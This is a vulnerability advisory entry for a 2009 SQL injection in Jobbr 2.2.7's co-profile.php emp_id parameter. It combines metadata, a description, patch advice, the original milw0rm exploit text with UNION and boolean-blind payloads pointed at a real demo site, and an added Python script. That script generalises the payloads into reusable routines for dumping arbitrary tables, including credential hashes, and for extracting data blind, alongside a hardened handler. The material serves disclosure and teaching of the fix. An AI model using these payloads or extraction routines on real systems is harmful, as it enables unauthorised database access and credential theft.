Vendor: Jobbr
Author: Moudi
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Jobbr
Affected Version From: 2.2.7
Affected Version To: 2.2.7
Patch Exists: Yes
Related CWE: N/A
CPE: a:jobbr:jobbr:2.2.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009

Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities

Jobbr v2.2.7 is vulnerable to remote SQL injection through the 'emp_id' parameter of the 'co-profile.php' page, which is placed in the database query without validation or escaping. The published exploit shows two ways of abusing that one parameter. The first is a UNION-based injection: a second SELECT is appended to the original query, with eight columns so that it lines up with the column count of the original statement, and the profile page then renders attacker-chosen data, in the example the MySQL version string: http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--. The second is a boolean-based blind injection, useful when query results are not shown directly: an extra condition is ANDed onto the original WHERE clause, the page is rendered normally when it is true and empty when it is false, and the attacker infers data one comparison at a time. The example tests whether the first character of the server version is 5: http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5. Either technique lets a remote attacker run attacker-controlled SELECT statements against the application database and read arbitrary data from it; the version() probes are only demonstrations that the injection works.

Mitigation:

The vendor has released a patch for this issue; upgrade to the latest version of Jobbr. The general fix for this class of bug is to treat emp_id as the integer it is meant to be (validate or cast it) and to pass it to the database as a bound parameter rather than by string concatenation; filtering keywords such as UNION is not a substitute.
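The following is an added example, not Jobbr's code (the page shows no source) and not part of the original advisory. It simulates the assumed shape of the flaw, the GET value concatenated into an eight-column SELECT, with an in-memory SQLite database standing in for MySQL, so sqlite_version() and substr() take the place of version(), @@version and SUBSTRING(). It runs the two payloads from the description above, generalises each into a reusable read-out routine (UNION for any expression and table, boolean-based blind for any value, one character per binary search), and shows the hardened handler the mitigation describes rejecting the same input. Table names, columns and sample rows are constructed for the example.

```python
# Added example, not Jobbr's code: sqlite3 stands in for MySQL, so
# sqlite_version()/substr() replace version()/@@version/SUBSTRING().
import sqlite3
from urllib.parse import unquote_plus

# Assumed column list; eight columns is what makes the page's 8-column UNION line up.
EMPLOYER_COLUMNS = "emp_id, name, email, phone, city, country, website, about"


def make_db():
    """Constructed sample data (the real Jobbr schema is not on the page)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE employers (emp_id INTEGER PRIMARY KEY, name TEXT, email TEXT,
            phone TEXT, city TEXT, country TEXT, website TEXT, about TEXT);
        INSERT INTO employers VALUES
            (1, 'Acme Corp', 'hr@acme.example', '555-0100', 'Springfield', 'US',
             'acme.example', 'Widgets'),
            (2, 'Globex', 'jobs@globex.example', '555-0101', 'Cypress Creek', 'US',
             'globex.example', 'Energy');
        CREATE TABLE users (id INTEGER, login TEXT, pwd_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def co_profile_vulnerable(conn, emp_id):
    """Assumed shape of the flaw: the raw GET value is concatenated into the query."""
    sql = f"SELECT {EMPLOYER_COLUMNS} FROM employers WHERE emp_id = {emp_id}"
    return conn.execute(sql).fetchall()


def co_profile_fixed(conn, emp_id):
    """Hardened handler: reject anything but digits, then bind the integer."""
    if not emp_id.isdigit():
        raise ValueError("emp_id must be an integer")
    sql = f"SELECT {EMPLOYER_COLUMNS} FROM employers WHERE emp_id = ?"
    return conn.execute(sql, (int(emp_id),)).fetchall()


def request(conn, raw_value, handler=co_profile_vulnerable):
    """Mimic the web server: $_GET['emp_id'] arrives URL-decoded (+ and %20 are spaces)."""
    return handler(conn, unquote_plus(raw_value))


def fixed_rejects(conn, raw_value):
    """True when the hardened handler refuses the value."""
    try:
        request(conn, raw_value, co_profile_fixed)
    except ValueError:
        return True
    return False


def union_read(conn, expression, from_clause=""):
    """UNION-based read-out: the page's 'null union select version(),2,...,8--'
    generalised to any expression and table. Returns the injected first column."""
    payload = f"null union select {expression},2,3,4,5,6,7,8 {from_clause}--"
    return [row[0] for row in co_profile_vulnerable(conn, payload)]


def blind_extract(conn, expression, max_len=64):
    """Boolean-based blind read-out: the page's 'AND SUBSTRING(@@version,1,1)=5'
    generalised. The profile row appears (true) or not (false); a binary search
    over printable ASCII recovers each character in about seven requests."""
    def oracle(condition):
        return len(co_profile_vulnerable(conn, f"1 AND ({condition})")) == 1

    result = ""
    for i in range(1, max_len + 1):
        if oracle(f"length({expression}) < {i}"):
            break                        # ran past the end of the value
        lo, hi = 32, 126                 # printable ASCII; assumption about the data
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expression}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    # The page's two payloads with sqlite function names substituted.
    print(request(db, "null+union+select+sqlite_version(),2,3,4,5,6,7,8--"))
    print(request(db, "1+AND%20substr(sqlite_version(),1,1)='3'"))  # one row: true
    print(request(db, "1+AND%20substr(sqlite_version(),1,1)='5'"))  # no rows: false
    print(union_read(db, "login || ':' || pwd_hash", "from users"))
    print(blind_extract(db, "sqlite_version()"))
    print(fixed_rejects(db, "null+union+select+sqlite_version(),2,3,4,5,6,7,8--"))
```

Run it directly to see the UNION payload return the backend version as the first column of the profile row, the two blind probes return one row and no rows respectively, the blind routine rebuild the same version string and the users table contents without ever seeing them rendered, and the hardened handler refuse the payload outright. Against a real MySQL backend only the function names in the payloads change; the request and oracle logic is the same, which is why an integer cast and a bound parameter, not a keyword blocklist, is the right fix.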

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] Hmmmm !? Nothing ! :D
==============================================================================
        [»] Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities
==============================================================================

        [»] Script:             [ Jobbr v2.2.7 ]
        [»] Language:           [ PHP ]
        [»] Download:           [ http://urx.in/jobbr ]
        [»] Founder:            [ Moudi or SixSo <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
        [»] Team:               [ EvilWay ]
        [»] SiteWeb:            [ Visit - www.opensc.ws ]
        [»] Price:              [ FREE ]

###########################################################################

===[ Exploit BLIND SQL + DEMO ]===

        [»] http://www.site.com/co-profile.php?emp_id=[SQL]
        [»] http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--

===[ Exploit BLIND SQL + DEMO ]===

        [»] http://www.site.com/co-profile.php?emp_id=[BLIND]
        [»] http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-10]